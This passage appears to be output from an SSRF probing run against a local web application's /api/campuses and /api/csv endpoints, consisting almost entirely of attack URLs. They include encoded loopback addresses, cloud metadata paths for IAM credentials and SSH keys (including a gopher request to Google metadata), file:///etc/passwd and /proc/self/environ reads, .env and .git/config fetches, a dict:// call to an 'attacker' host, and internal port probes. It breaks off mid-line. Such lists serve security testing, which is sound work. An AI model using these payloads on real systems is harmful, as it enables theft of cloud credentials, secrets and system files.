`http://localhost:4200/api/campuses?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/campuses?url=2130706433%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235777%2F` +- Testing: `http://localhost:4200/api/campuses?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/campuses?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/campuses?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/campuses?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/campuses?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=0%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/campuses?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1.3` +- Testing: `http://localhost:4200/api/campuses?url=0` +- Testing: `http://localhost:4200/api/campuses?url=127.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1` +- Testing: `http://localhost:4200/api/campuses?url=localhost` +- Testing: `http://localhost:4200/api/campuses?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/campuses?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/campuses?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/campuses?url=7F000001` +- Testing: `http://localhost:4200/api/campuses?url=2130706433` +- Testing: `http://localhost:4200/api/campuses?url=6425673729` +- Testing: `http://localhost:4200/api/campuses?url=127001` +- Testing: `http://localhost:4200/api/campuses?url=127_0._0_1` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127` +- Testing: `http://localhost:4200/api/campuses?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001` +- Testing: `http://localhost:4200/api/campuses?url=017700000001` +- Testing: `http://localhost:4200/api/campuses?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/campuses?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/campuses?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/campuses?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/campuses?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254` +- Testing: `http://localhost:4200/api/campuses?url=2852039166` +- Testing: `http://localhost:4200/api/campuses?url=7147006462` +- Testing: `http://localhost:4200/api/campuses?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/campuses?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/campuses?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/campuses?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/campuses?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/campuses?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/campuses?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/campuses?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/campuses?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/campuses?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/campuses?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.0` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521` +- Testing: `http://localhost:4200/api/campuses?url=3232235777` +- Testing: `http://localhost:4200/api/campuses?url=425.510.425.510` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=instance-data` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A22` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A443` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A80` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/campuses?url=loopback` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A22` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A80` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A443` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/campuses?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/campuses?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/campuses?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/campuses?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=127.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/campuses?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/campuses?url=2130706433%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235777%2F` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/campuses?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=0%2F` +- Testing: `http://localhost:4200/api/campuses?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/csv +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/csv?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/csv?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/csv?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/csv?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/csv?url=127.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=0` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/csv?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127` +- Testing: `http://localhost:4200/api/csv?url=127.0.1.3` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.0` +- Testing: `http://localhost:4200/api/csv?url=2130706433` +- Testing: `http://localhost:4200/api/csv?url=017700000001` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001` +- Testing: `http://localhost:4200/api/csv?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/csv?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/csv?url=google.com.localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: 